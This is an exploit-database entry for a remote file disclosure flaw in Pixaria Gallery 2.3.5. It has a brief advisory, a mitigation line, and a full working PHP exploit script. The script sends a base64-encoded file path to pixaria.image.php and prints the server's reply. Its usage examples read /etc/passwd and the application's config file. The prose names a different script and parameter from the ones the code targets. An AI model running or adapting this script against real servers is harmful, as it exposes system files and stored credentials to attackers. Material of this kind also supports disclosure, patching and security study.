header-logo
Suggest Exploit
vendor:
Pixaria Gallery
by:
Qabandi
8,8
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: Pixaria Gallery
Affected Version From: 2.3.5
Affected Version To: 2.3.5
Patch Exists: YES
Related CWE: N/A
CPE: a:pixaria:pixaria_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Pixaria Gallery 2.3.5 Remote File Disclosure Exploit

Pixaria Gallery 2.3.5 is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to gain access to sensitive files on the server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'page' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious 'page' parameter to the vulnerable script. This will allow the attacker to view the contents of any file on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of Pixaria Gallery.
Source

Exploit-DB raw data:

<?php
ini_set("max_execution_time",0);
print_r('
                                       ||          ||   | ||
                                o_,_7 _||  . _o_7 _|| q_|_||  o_///_,
                               (  :  /    (_)    /           (      .

                                        ___________________
                                      _/QQQQQQQQQQQQQQQQQQQ\__
[q] Pixaria Gallery 2.3.5          __/QQQ/````````````````\QQQ\___
  Remote File Disclosure         _/QQQQQ/                  \QQQQQQ\
[q] _GET   <3                   /QQQQ/``                    ```QQQQ\
                               /QQQQ/                          \QQQQ\
[q] http://pixaria.com        |QQQQ/    By  Qabandi             \QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                              |QQQQ|                            |QQQQ|
                              |QQQQ\       iqa[a]hotmail.fr     /QQQQ|
[/]   -[hai]-                  \QQQQ\                      __  /QQQQ/
                                \QQQQ\                    /QQ\_QQQQ/
                                 \QQQQ\                   \QQQQQQQ/
                                  \QQQQQ\                 /QQQQQ/_
                                   ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                      ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                         ```````````````````     `````
 ______________________________________________________________________________
/                                                                              \
|                          meh.....                                            |
\______________________________________________________________________________/
                                \ No More Private /
                                 `````````````````
');

if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage:   php '.$argv[0].' VICTIM DIR FILE

example: php '.$argv[0].' EXAMPLE /demo/ /etc/passwd

or if in root dir:
example: php '.$argv[0].' EXAMPLE // /etc/passwd
php '.$argv[0].' EXAMPLE // ./pixaria.config.php
-----------------------------------------------------------------------------
');
die;
}
 function QABANDI($victim,$vic_dir,$file){
$host = $victim;
$p = "http://".$host.$vic_dir;


$file2 = base64_encode($file);

          $packet ="GET ".$p."/pixaria.image.php?file=".$file2." HTTP/1.0\r\n";
          $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
          $packet.="Pragma: no-cache\r\n";
          $packet.="Connection: Close\r\n\r\n";

	$o = @fsockopen($host, 80);
	if(!$o){
		echo "\n[x] No response...\n";
		die;
	}
	
	fputs($o, $packet);
	while (!feof($o)) $data .= fread($o, 1024);
	fclose($o);
	
	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
	if ( !empty($_404) ){
		echo "\n[x] 404 Not Found... Make sure of path. \n";
		die;
	}

                                           return $data;

 }

$host1 = $argv[1];
$userdir1=$argv[2];
$file= $argv[3];







if ($argc > 2) {
  

echo "Getting file Data....[i9bir]\n";
print_r(QABANDI($host1,$userdir1,$file));


}
?>

# milw0rm.com [2009-07-24]

Navigation

Suggest Exploit

Services By CQR